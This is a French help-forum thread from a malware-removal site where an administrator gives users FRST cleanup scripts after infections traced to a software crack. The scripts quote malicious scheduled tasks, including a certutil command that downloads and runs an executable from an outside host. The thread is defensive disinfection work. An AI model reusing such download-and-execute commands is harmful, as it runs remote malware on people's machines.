infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Aide à la désinfection pour supprimer les virus, adwares, ransomwares, trojans.

Modérateurs : Mods Windows, Helper

Malekal_morte
Site Admin
Site Admin
Messages : 97025
Inscription : 10 sept. 2005 13:57
Contact :

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par Malekal_morte » 16 juin 2019 10:10

de rien =)

Evite les les cracks et tout ira bien à l'avenir =)


Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


KATRIN955
newbie
newbie
Messages : 8
Inscription : 23 juil. 2019 11:46

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par KATRIN955 » 23 juil. 2019 11:54

Bonjour je suis dépité j'ai beaucoup trop d'annonce de pub qui s'ouvre a chaque cliques en onglet etc. Cela à commencer dès que j'ai installé l'extension Adblock sur chrome ! Depuis j'ai supprimé celui-ci et impossible à réinstallé ! Il y avait mail ru que j'ai supprimé. En faite j'ai supprimé tout les logiciel de mon ordi qui ne me serve pas et rien n'y fait toujours le même souci et même avec internet explorer… De plus j'avais installé CCleaner mais j'ai l'impression que sa à amplifié depuis. Pouvez vous m'aider merci d'avance , voici les liens :

https://pjjoint.malekal.com/files.php?i ... 13g15n7v11
https://pjjoint.malekal.com/files.php?i ... o9n12e15e7
https://pjjoint.malekal.com/files.php?i ... 10d10d5f11

Malekal_morte
Site Admin
Site Admin
Messages : 97025
Inscription : 10 sept. 2005 13:57
Contact :

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par Malekal_morte » 23 juil. 2019 12:02

Salut,

Normal, tu as infecté ton PC après avoir téléchargé un crack.
CCleaner ne supprime pas les virus.
D'ailleurs il est très peu utile, tu devrais le désinstaller.


Voici la correction à effectuer avec FRST. Tu peux t'aider de cette Voici la correction à effectuer avec FRST. Tu peux t'aider de cette #fix note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Code : Tout sélectionner

Start:
CloseProcesses:
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-2605350831-1999837865-1271833924-1001\...\Run: [MaxiBuy] => "C:\Users\METISS\AppData\Roaming\MaxiBuy\python\pythonw.exe" "load.pyc" ml2 <==== ATTENTION
HKU\S-1-5-21-2605350831-1999837865-1271833924-1001\...\Run: [SpringBush] => C:\Windows\rss\csrss.exe [5254144 2019-07-07] () [Fichier non signé] <==== ATTENTION
HKU\S-1-5-21-2605350831-1999837865-1271833924-1001\...\Run: [CloudNet] => C:\Users\METISS\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-07-22] (EpicNet Inc.) [Fichier non signé] <==== ATTENTION
HKU\S-1-5-21-2605350831-1999837865-1271833924-1001\...\Policies\Explorer: [NoSecurityTab] 1
GroupPolicy: Restriction - Chrome <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {144C728A-B72B-4613-AC4F-4B0D3FCFA313} - System32\Tasks\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP => C:\Windows\SysWOW64\Microsoft\Protect\S-1-58-63\RB_1.3.17.98.exe <==== ATTENTION
Task: {16081496-0F4F-464C-BC34-FFF8C6F16753} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://gamedemo.xyz/app/app.exe C:\Users\METISS\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\METISS\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {1EF3C18C-208A-40BC-AE4C-D67C946F843E} - System32\Tasks\Opera scheduled assistant Autoupdate 1549911937 => C:\Users\METISS\AppData\Local\Programs\Opera\launcher.exe
Task: {3B9F6336-9C8D-4E66-B167-335E45506DE6} - System32\Tasks\Sk5784Pl => C:\Users\METISS\AppData\Roaming\prunld2633\he59278.exe [1387922 2019-07-07] ( ) [Fichier non signé]
Task: {3C7A26FE-E993-4627-A7BA-403F1DA2F59D} - System32\Tasks\System\SystemCheck => C:\Users\METISS\AppData\Roaming\Microsoft\Windows\Helper.exe [7585280 2019-07-04] () [Fichier non signé] <==== ATTENTION
Task: {7F45EE85-3200-4177-B72E-BC56EC6CB70F} - System32\Tasks\MaxiBuy2 => C:\Users\METISS\AppData\Roaming\MaxiBuy\python\pythonw.exe <==== ATTENTION
Task: {82C3CF77-03C6-4077-81BD-02BDFF3D242D} - System32\Tasks\MaxiBuy => C:\Users\METISS\AppData\Roaming\MaxiBuy\python\pythonw.exe <==== ATTENTION
Task: {A47864D8-ADA8-42F6-B26A-AA750F7A8356} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [5254144 2019-07-07] () [Fichier non signé] <==== ATTENTION
Task: {B01E2008-6FE1-46D6-AF14-C71C0B22E443} - System32\Tasks\gnkkxxjpuhcas => msiexec.exe /quiet /i "C:\Users\METISS\AppData\Roaming\pllbsfowubll\hjpgdsihkkrizjt.msi" WEBID=P_CHR_UPDATE TKNME=gnkkxxjpuhcas
Task: {BF1E1B48-7839-4887-AE28-48C0354E8B85} - System32\Tasks\nlldrsbgfnmfgpv => msiexec.exe /quiet /i "C:\Users\METISS\AppData\Roaming\pllbsfowubll\hjpgdsihkkrizjt.msi" WEBID=P_CHR_UPDATE TKNME=nlldrsbgfnmfgpv
S3 Guishanpking; \??\C:\Windows\system32\Guishanpking.sys [X]
2019-07-07 12:41 - 2019-03-24 10:29 - 000000000 ____D C:\Users\METISS\AppData\Local\Mail.Ru
2019-07-07 12:41 - 2019-03-24 10:29 - 000000000 ____D C:\Program Files (x86)\Mail.Ru
2019-07-07 12:38 - 2019-03-24 10:29 - 000000000 ____D C:\Users\METISS\AppData\Roaming\MaxiBuy
2019-07-07 13:14 - 2019-07-07 13:20 - 000000000 ____D C:\Users\METISS\AppData\Roaming\signcut
2019-07-07 13:13 - 2019-07-07 13:13 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SignCut Pro 2
2019-07-07 12:29 - 2019-07-07 12:29 - 000000000 ____D C:\Users\METISS\AppData\Roaming\NVIDIA
2019-07-07 12:17 - 2019-07-07 12:17 - 000030912 _____ (FsFilter Network) C:\Windows\system32\Drivers\b197aded91b3164f.sys
2019-07-07 12:17 - 2019-07-07 12:17 - 000000000 ____D C:\Users\METISS\AppData\Roaming\EpicNet Inc
2019-07-07 12:16 - 2019-07-23 11:04 - 000003590 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2019-07-07 12:16 - 2019-07-23 11:04 - 000003274 _____ C:\Windows\System32\Tasks\csrss
2019-07-07 12:16 - 2019-07-07 12:16 - 001435136 ____H C:\Windows\windefender.exe
2019-07-07 12:16 - 2019-07-07 12:16 - 000000000 ____D C:\Windows\System32\Tasks\System
2019-07-07 12:16 - 2019-07-07 12:16 - 000000000 ____D C:\Users\METISS\AppData\Roaming\1337
2019-07-07 12:15 - 2019-07-23 11:08 - 000000000 __SHD C:\Users\METISS\AppData\Roaming\x86_microsoft-windows-mlang.resources_31bf3856ad364e35_6.1.7600.16385_de-de_dd2822fe8544398a
2019-07-07 12:15 - 2019-07-09 23:40 - 000000290 __RSH C:\Users\METISS\ntuser.pol
2019-07-07 12:15 - 2019-07-07 12:15 - 000003478 _____ C:\Windows\System32\Tasks\MaxiBuy
2019-07-07 12:15 - 2019-07-07 12:15 - 000003474 _____ C:\Windows\System32\Tasks\MaxiBuy2
2019-07-07 12:15 - 2019-07-07 12:15 - 000003288 _____ C:\Windows\System32\Tasks\Sk5784Pl
2019-07-07 12:15 - 2019-07-07 12:15 - 000003286 __RSH C:\ProgramData\ntuser.pol
2019-07-07 12:15 - 2019-07-07 12:15 - 000000000 ___HD C:\Windows\rss
2019-07-07 12:15 - 2019-07-07 12:15 - 000000000 ____D C:\Windows\System32\Tasks\W-3-1-42-1098642716-1195764222-1186319070-3979
2019-07-07 12:15 - 2019-07-07 12:15 - 000000000 ____D C:\Users\METISS\AppData\Roaming\prunld2633
2019-07-07 12:15 - 2019-07-07 12:15 - 000000000 ____D C:\ProgramData\Padur
2019-07-07 12:14 - 2019-07-07 12:15 - 000000000 ____D C:\ProgramData\Optimizer
2019-07-07 12:14 - 2019-07-07 12:14 - 003835904 _____ C:\Users\METISS\Downloads\signcut_v1.63_f4f8891e15382fc53_21906-d67e65452d.iso
2019-07-07 12:14 - 2019-07-07 12:14 - 000852480 _____ C:\Users\METISS\Documents\setup.exe
2019-07-07 12:14 - 2019-07-07 12:14 - 000825856 _____ C:\Default.xml
2019-07-07 12:14 - 2019-07-07 12:14 - 000000000 ____D C:\Program Files (x86)\Inlog Software
2019-07-07 12:10 - 2019-07-07 12:10 - 043431704 _____ C:\Users\METISS\Downloads\scpro (3).exe
2019-07-07 11:15 - 2019-07-07 11:15 - 000059927 _____ C:\Users\METISS\Downloads\Etiquettes-FV38724579.pdf
2019-07-07 10:33 - 2019-07-07 10:33 - 002675946 _____ C:\Users\METISS\Downloads\skull-bones-drawing.zip
2019-07-07 10:33 - 2019-07-07 10:33 - 002060306 _____ C:\Users\METISS\Downloads\mexican-skull-design.zip
2019-07-07 10:32 - 2019-07-07 10:33 - 001117921 _____ C:\Users\METISS\Downloads\dark-hand-drawn-skull-background.zip
2019-07-07 10:31 - 2019-07-07 10:31 - 001045553 _____ C:\Users\METISS\Downloads\cranium-tattoo-design.zip
2019-07-07 10:30 - 2019-07-07 10:30 - 000859058 _____ C:\Users\METISS\Downloads\sketchy-skull.zip
2019-07-07 10:30 - 2019-07-07 10:30 - 000819609 _____ C:\Users\METISS\Downloads\skull-with-ethnic-geometric.zip
EmptyTemp:
RemoveProxy:
Hosts:
Reboot:
End:
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
(L'ordinateur peut redémarrer tout seul, si le rapport de correction ne s'ouvre pas, cherche un fichier fixlog.txt qui se trouve dans le même dossier que FRST)


2) réinitialiser les navigateurs:
==================================
Réinitialise tes navigateurs et/ou re-paramètre manuellement tes navigateurs WEB ( page de démarrage, moteur de recherche, etc ) mais aussi supprimer/désactiver les extensions inutiles/parasites.
Pour t'aider à effectuer ce ménage, clique ci-dessous sur le nom du navigateur WEB que tu utilises :
* Réinitialiser et réparer Mozilla Firefox
* Réinitialiser et réparer Google Chrome
* Réinitialiser et réparer Internet Explorer
(Ne pas utiliser Zeok)

3)
Faire un nettoyage Malwarebytes Anti-Malware (MBAM ) version gratuite

4)
Refais un scan FRST et donne les nouveaux rapports via pjjoint
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

KATRIN955
newbie
newbie
Messages : 8
Inscription : 23 juil. 2019 11:46

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par KATRIN955 » 24 juil. 2019 11:52

Bonjour merci pour ta réponse je n'avais pas eu de notification … Alors j'ai refait la procédure avec FRST cela est ok par contre je n'arrive pas à installé chrome voici ce qu'il m'indique que googleupdate n'est pas autoriser dans le pare feu mais j'ai regarder il ne si trouve pas

faut il que je refasse un scan FRST?

Malekal_morte
Site Admin
Site Admin
Messages : 97025
Inscription : 10 sept. 2005 13:57
Contact :

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par Malekal_morte » 24 juil. 2019 12:28

Tu peux donner le message complet d'erreur quand tu veux l'installer ?
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


KATRIN955
newbie
newbie
Messages : 8
Inscription : 23 juil. 2019 11:46

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par KATRIN955 » 24 juil. 2019 14:21

Le message d'erreur à changer maintenant il m'indique le code erreur 0Xa0430721 et je n'arrive pas à acceder a la page de téléchargement de l'antimalware

KATRIN955
newbie
newbie
Messages : 8
Inscription : 23 juil. 2019 11:46

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par KATRIN955 » 24 juil. 2019 14:24

voici le message d'erreur concernant le téléchargement
Désolé, nous ne pouvons pas atteindre cette page
Essayer
Assurez-vous d’avoir la bonne adresse web : https://downloads.malwarebytes.com
Rechercher "https://downloads.malwarebytes.com" sur Bing
Actualiser la page

Malekal_morte
Site Admin
Site Admin
Messages : 97025
Inscription : 10 sept. 2005 13:57
Contact :

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par Malekal_morte » 24 juil. 2019 14:25

ok,

donne le rapport de correction FRST
refais un scan FRST et donne à nouveau les rapports.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.



Malekal_morte
Site Admin
Site Admin
Messages : 97025
Inscription : 10 sept. 2005 13:57
Contact :

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par Malekal_morte » 24 juil. 2019 20:21

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette Voici la correction à effectuer avec FRST. Tu peux t'aider de cette #fix note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Code : Tout sélectionner

Start:
CloseProcesses:
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
CHR HKU\S-1-5-21-2605350831-1999837865-1271833924-1001\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {0DE7DF7B-CBDD-43CD-A166-8A1E157A16F1} - \W-3-1-42-1098642716-1195764222-1186319070-3979\{Y1834179-MVYD-516G-GQKW-GNHUXNQLPYO} -> Pas de fichier <==== ATTENTION
S3 wuauserv; C:\Windows\system32\svchost.exe [51696 2018-09-15] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (pas de ServiceDLL)
S3 wuauserv; C:\Windows\SysWOW64\svchost.exe [45448 2018-09-15] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (pas de ServiceDLL)
2019-07-07 12:15 - 2019-07-23 11:08 - 000000000 __SHD C:\Users\METISS\AppData\Roaming\x86_microsoft-windows-mlang.resources_31bf3856ad364e35_6.1.7600.16385_de-de_dd2822fe8544398a
EmptyTemp:
RemoveProxy:
Hosts:
Reboot:
End:
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
(L'ordinateur peut redémarrer tout seul, si le rapport de correction ne s'ouvre pas, cherche un fichier fixlog.txt qui se trouve dans le même dossier que FRST)


Remets/Vérifie que tous les serveurs de noms (DNS) sont automatiques.
Suivre le paragraphe "Comment modifier les serveurs DNS sur Windows" de la page suivante : https://www.malekal.com/comment-changer-les-dns/
ou encore suivre le paragraphe "manuellement" PUIS vide ensuite le cache DNS et internet. Ces 3 étapes sont importantes et à faire sinon les publicités vont continuer.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

KATRIN955
newbie
newbie
Messages : 8
Inscription : 23 juil. 2019 11:46

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par KATRIN955 » 24 juil. 2019 22:34

Alors voici le rapport :
https://pjjoint.malekal.com/files.php?i ... 14r10t14i5

Je refait toutes la procédure que tu ma indiqué. Au faite tu m'a indiqué un crack qui n'étais pas intéressant peux tu me dire lequel que je vois pour le supprimé aussi

KATRIN955
newbie
newbie
Messages : 8
Inscription : 23 juil. 2019 11:46

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par KATRIN955 » 24 juil. 2019 22:57

Tous à étais refais sa a l'air d'être bon avec chrome, est ce que je remet ad bloc ? CC cleaner ? Parce que j'avais l'impression que cela est arrivé depuis que je les est installé … En tout cas un grand merci !

Avatar de l’utilisateur
SophieSamb
Messages : 2
Inscription : 02 août 2019 05:36

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par SophieSamb » 02 août 2019 05:54

bonsoir à tous,au fait jai le même problème,mon google refuse de s'installer.Aider moi svp
Voici donc les liens pour les documents générés par FRST 5FRST, ADDITION, SHORTCUT) si quelqu'un veut bien me venir en aide.
Merci d'avance
https://pjjoint.malekal.com/files.php?i ... 13l8o14r11
https://pjjoint.malekal.com/files.php?i ... 2j10m8p6i8
https://pjjoint.malekal.com/files.php?i ... u5j15k5b14

Malekal_morte
Site Admin
Site Admin
Messages : 97025
Inscription : 10 sept. 2005 13:57
Contact :

Re: infecté : Votre administrateur réseau a appliquer une stratégie de groupe qui empêche l'installation

Message par Malekal_morte » 02 août 2019 09:22

Salut SophiSam,

c'est lié à un des infections.



Voici la correction à effectuer avec FRST. Tu peux t'aider de cette Voici la correction à effectuer avec FRST. Tu peux t'aider de cette #fix note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Code : Tout sélectionner

Start:
CloseProcesses:
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {ACB1BC09-F6B1-41FB-9EE2-515AE49BEF87} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [4553728 2019-01-30] () [Fichier non signé] <==== ATTENTION
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\autoconfig.js [2018-11-08] <==== ATTENTION (Pointe vers un fichier *.cfg)
FF ExtraCheck: C:\Program Files\mozilla firefox\cck2.cfg [2018-11-08] <==== ATTENTION
R1 C4BF1092E4A2; C:\WINDOWS\C4BF1092E4A2.sys [621928 2019-01-30] (韵羽健康管理咨询(上海)有限公司 -> VideoDriver) <==== ATTENTION
S1 bjdthouq; \??\C:\WINDOWS\system32\drivers\bjdthouq.sys [X]
S1 eciszuww; \??\C:\WINDOWS\system32\drivers\eciszuww.sys [X]
S1 gbnlsdkf; \??\C:\WINDOWS\system32\drivers\gbnlsdkf.sys [X]
S1 ootoiivg; \??\C:\WINDOWS\system32\drivers\ootoiivg.sys [X]
C:\WINDOWS\C4BF1092E4A2.sys
HKU\S-1-5-21-1562485281-2408517061-278138858-1001\...\Run: [WispySnow] => C:\WINDOWS\rss\csrss.exe [4553728 2019-01-30] () [Fichier non signé] <==== ATTENTION002] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\hp\AppData\Local\Microsoft\OneDrive\19.123.0624.0002"
EmptyTemp:
RemoveProxy:
Hosts:
Reboot:
End:
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
(L'ordinateur peut redémarrer tout seul, si le rapport de correction ne s'ouvre pas, cherche un fichier fixlog.txt qui se trouve dans le même dossier que FRST)


2) réinitialiser les navigateurs:
==================================
Réinitialise tes navigateurs et/ou re-paramètre manuellement tes navigateurs WEB ( page de démarrage, moteur de recherche, etc ) mais aussi supprimer/désactiver les extensions inutiles/parasites.
Pour t'aider à effectuer ce ménage, clique ci-dessous sur le nom du navigateur WEB que tu utilises :
* Réinitialiser et réparer Mozilla Firefox
* Réinitialiser et réparer Google Chrome
* Réinitialiser et réparer Internet Explorer
(Ne pas utiliser Zeok)

3)
Faire un nettoyage Malwarebytes Anti-Malware (MBAM ) version gratuite

4)
Refais un scan FRST et donne les nouveaux rapports via pjjoint
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


Répondre

Revenir vers « VIRUS : Supprimer/Desinfecter (Trojan, Adwares, Ransomwares, Backdoor, Spywares) »